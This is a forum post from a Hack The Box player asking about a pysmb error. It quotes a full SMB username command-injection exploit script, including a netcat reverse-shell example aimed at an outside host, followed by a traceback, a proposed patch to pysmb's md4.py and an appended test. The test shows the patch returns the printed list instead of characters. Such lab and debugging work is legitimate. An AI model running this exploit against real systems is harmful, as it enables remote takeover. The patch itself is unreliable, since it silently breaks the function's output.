Hey everyone,
I'm writing here since I'm not confident enough to report this as a bug, so please review what I've written here:
My system:
Linux P4cm4n 5.15.0-33-generic #34-Ubuntu SMP Wed May 18 13:34:26 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Python version: Python 3.10.4 (main, Apr 2 2022, 09:04:19) [GCC 11.2.0] on linux
I was doing Hack The Box machines and trying to use one of the exploits:
```python
#!/usr/bin/python3
import sys
try:
    from smb.SMBConnection import SMBConnection
except:
    print("pysmb is not installed: python3 -m pip install pysmb")
    quit()
if not (2 < len(sys.argv) < 5):
    print("Usage:")
    print(" python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
    print(" IP - Ip of the remote machine.")
    print(" PORT - (Optional) Port that smb is running on.")
    print(" PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.")
    print("")
    print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
    quit()
if len(sys.argv) == 3:
    ip = sys.argv[1]
    port = 139
    payload = sys.argv[2]
else:
    ip = sys.argv[1]
    port = sys.argv[2]
    payload = sys.argv[3]
user = "`" + payload + "`"
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)
try:
    print("[*] Sending the payload")
    conn.connect(ip, int(port))
    print("[*] Payload was send successfully")
    quit()
except Exception as e:
    print("[*] Something went wrong")
    print(e.args)
    print("ERROR:")
    print(e)
    quit()
print("Example: python3 exploit.py 10.10.10.3 139 'nc -e /bin/sh 10.10.14.3 4444'")
```
This script returns an error in:
```
  File "/home/p4cm4n/.local/lib/python3.10/site-packages/smb/utils/md4.py", line 251, in int_array2str
    nstr = nstr + str(chr(i))
TypeError: 'U32' object cannot be interpreted as an integer
```
So I made some upgrades to the file md4.py.
Changes in file:
smb/utils/md4.py
Removed:
```python
def int_array2str(array):
    nstr = ''
    for i in array:
        nstr = nstr + str(chr(i))
    return nstr
```
Added:
```python
def int_array2str(array):
    return ''.join(str(array))
```
After that everything works perfectly.
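
Added example, not part of the original post and not pysmb's own code: it runs the two `int_array2str` versions from the post next to a variant that converts each element with `int()` before calling `chr()`. `FakeU32` is a hypothetical stand-in for pysmb's `U32`, assumed to support `int()` but not `__index__`, which is what the Python 3.10 traceback implies; the sample values are constructed.

```python
class FakeU32:
    """Hypothetical stand-in for pysmb's U32 (assumption: __int__ only)."""
    def __init__(self, value):
        self.v = value & 0xFFFFFFFF

    def __int__(self):
        return self.v

    def __repr__(self):
        return hex(self.v)


def int_array2str_original(array):
    """Version listed under 'Removed' in the post."""
    nstr = ''
    for i in array:
        nstr = nstr + str(chr(i))
    return nstr


def int_array2str_posted(array):
    """Version listed under 'Added' in the post."""
    return ''.join(str(array))


def int_array2str_coerced(array):
    """One character per value, with an explicit int() conversion."""
    return ''.join(chr(int(i)) for i in array)


def original_fails(array):
    """True if the original version raises TypeError on this input."""
    try:
        int_array2str_original(array)
    except TypeError:
        return True
    return False


# Constructed sample: four byte values wrapped in the stand-in type.
SAMPLE = [FakeU32(b) for b in (0x31, 0xD6, 0xCF, 0xE0)]

if __name__ == "__main__":
    print("original raises TypeError:", original_fails(SAMPLE))
    print("posted  :", repr(int_array2str_posted(SAMPLE)))
    print("coerced :", repr(int_array2str_coerced(SAMPLE)))
```

The posted replacement returns the printed form of the whole list rather than one character per value, so anything computed from its result differs from what the original function produced.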